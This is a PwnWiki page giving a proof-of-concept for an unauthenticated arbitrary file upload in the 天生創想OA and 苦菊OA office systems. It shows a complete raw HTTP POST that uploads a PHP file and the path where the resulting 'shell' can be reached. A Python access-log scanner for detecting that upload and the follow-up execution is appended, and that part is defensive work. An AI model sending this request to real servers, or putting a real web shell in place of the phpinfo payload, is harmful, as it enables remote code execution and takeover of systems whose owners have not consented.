Difference between revisions of "天生創想OA & 苦菊OA Unauthorized Arbitrary File Upload Vulnerability"

From PwnWiki
(Created page with "<languages /> ==POC== <pre> POST /upload/index.php?userid=1 HTTP/1.1 Host: www.xxx.com User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64; rv:86.0) Gecko/20100101 Firefox/86...")
 
(Marked this version for translation)
 
Line 29: Line 29:
  
 
<translate>
 
<translate>
==Shell地址==
+
==Shell地址== <!--T:1-->
 
</translate>
 
</translate>
 
http://<target>/data//uploadfile//1//shell.php
 
http://<target>/data//uploadfile//1//shell.php

Latest revision as of 14:07, 13 July 2021

POC

POST /upload/index.php?userid=1 HTTP/1.1
Host: www.xxx.com
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: application/json, text/javascript,*/*; q=0.01
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer:http://www.xxx.com/admin.php?ac=document&fileurl=knowledge&type=1&menuid=24
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;boundary=---------------------------115858488212690034922831875554
Content-Length: 256
Origin: http://www.xxx.com
Connection: close
 
-----------------------------115858488212690034922831875554
Content-Disposition: form-data;name="files[]"; filename="1.php"
Content-Type: text/plain
 
<?php
echo 123;
phpinfo();
?>
 
-----------------------------115858488212690034922831875554--

Shell address

http://<target>/data//uploadfile//1//shell.php
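
Detection logic for the request and shell path shown above, added here as an example and not part of the original PwnWiki page: it scans web server access logs for POSTs to /upload/index.php and for script files requested from /data/uploadfile/, and correlates the two by client address. The combined log format, the script-extension list, the finding labels and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Combined log format (assumed): client IP, method, request target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
UPLOAD_ENDPOINT = "/upload/index.php"  # endpoint in the PoC request
UPLOAD_DIR = "/data/uploadfile/"       # directory in the shell URL
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)  # assumed extension list


def normalize(target):
    """Drop the query, percent-decode, and collapse repeated slashes ('//')."""
    path = unquote(target.split("?", 1)[0])
    return re.sub(r"/{2,}", "/", path)


def scan(lines):
    """Return (client, kind, path) findings in log order."""
    uploaders, findings = set(), []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, method, target, status = m.groups()
        path = normalize(target)
        if method == "POST" and path.lower() == UPLOAD_ENDPOINT:
            uploaders.add(client)
            findings.append((client, "upload-post", path))
        elif path.lower().startswith(UPLOAD_DIR) and SCRIPT_EXT.search(path):
            # Scripts should never be served from the upload directory.
            kind = "script-in-upload-dir"
            if status == "200" and client in uploaders:
                kind = "upload-then-execute"  # same client uploaded, then got a 200
            findings.append((client, kind, path))
    return findings


# Constructed sample log lines, not taken from a real system.
SAMPLE = [
    '203.0.113.7 - - [13/Jul/2021:14:01:02 +0000] "POST /upload/index.php?userid=1 HTTP/1.1" 200 57 "-" "-"',
    '203.0.113.7 - - [13/Jul/2021:14:01:09 +0000] "GET /data//uploadfile//1//shell.php HTTP/1.1" 200 8123 "-" "-"',
    '198.51.100.4 - - [13/Jul/2021:14:02:00 +0000] "GET /data/uploadfile/1/report.pdf HTTP/1.1" 200 2048 "-" "-"',
    '198.51.100.9 - - [13/Jul/2021:14:03:00 +0000] "GET /data/uploadfile/2/a.PHP HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

An "upload-then-execute" finding is the one to triage first; "upload-post" on its own only records that the endpoint was used.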